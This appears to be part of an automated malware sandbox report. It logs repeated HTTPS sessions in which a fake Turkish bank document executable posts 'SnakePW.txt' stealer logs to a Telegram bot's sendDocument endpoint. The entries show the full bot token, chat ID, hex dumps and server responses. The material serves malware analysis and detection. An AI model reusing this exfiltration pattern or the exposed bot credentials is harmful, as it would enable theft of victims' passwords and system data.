                                      2024-09-26 09:01:35 UTC516INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 39 35 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35871,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341295,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      98192.168.2.449847149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:35 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd0477f2d17d84
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:35 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 34 37 37 66 32 64 31 37 64 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd0477f2d17d84Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:36 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:36 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:36 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 39 36 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35872,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341296,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      99192.168.2.449848149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:36 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd04cd8c845f88
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:36 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 34 63 64 38 63 38 34 35 66 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd04cd8c845f88Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:37 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:37 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:37 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 39 37 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35873,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341297,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      100192.168.2.449849149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:37 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd05245e6271d3
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:37 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 35 32 34 35 65 36 32 37 31 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd05245e6271d3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:38 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:38 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:38 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 39 38 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35874,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341298,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      101192.168.2.449850149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:39 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd0567912c48b5
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:39 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 35 36 37 39 31 32 63 34 38 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd0567912c48b5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:40 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:40 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:40 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 30 30 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35875,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341300,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      102192.168.2.449851149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:41 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd06087186fd40
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:41 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 36 30 38 37 31 38 36 66 64 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd06087186fd40Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:41 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:41 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:41 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 30 31 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35876,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341301,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      103192.168.2.449852149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:41 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd066f4ea4de0b
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:41 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 36 36 66 34 65 61 34 64 65 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd066f4ea4de0bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:42 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:42 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:42 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 30 32 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35877,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341302,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      104192.168.2.449853149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:43 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd06ce01d0608b
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:43 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 36 63 65 30 31 64 30 36 30 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd06ce01d0608bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:43 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:43 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
